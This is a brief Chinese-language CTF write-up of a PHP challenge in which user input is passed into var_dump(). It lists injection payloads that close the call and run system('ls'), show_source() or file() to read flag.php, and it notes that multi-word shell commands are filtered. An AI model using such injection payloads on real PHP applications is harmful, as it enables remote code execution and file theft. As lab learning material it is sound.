最近入手CTF,写一些笔记记录一下
由题中可知
想要执行系统命令需要先闭合var_dump里面的()
构造 123) system("ls" 查看该目录下的文件
发现flag.php就在当前目录下 ,可尝试show_source("flag.php") 拿到flag
hello=show_source("flag.php")
或
hello=file("flag.php")(有没有大佬可以讲解一下为什么用文件读取函数不用闭合avr_dump()可以直接执行)
拿到flag
或者继续构造用Linux命令去查看flag.php
但是这里有一个坑
不能用两个单词的命令查看,替换空格也不行
既然执行命令不行,就直接打印出flag,
123); print_r(file("./flag.php")
得到flag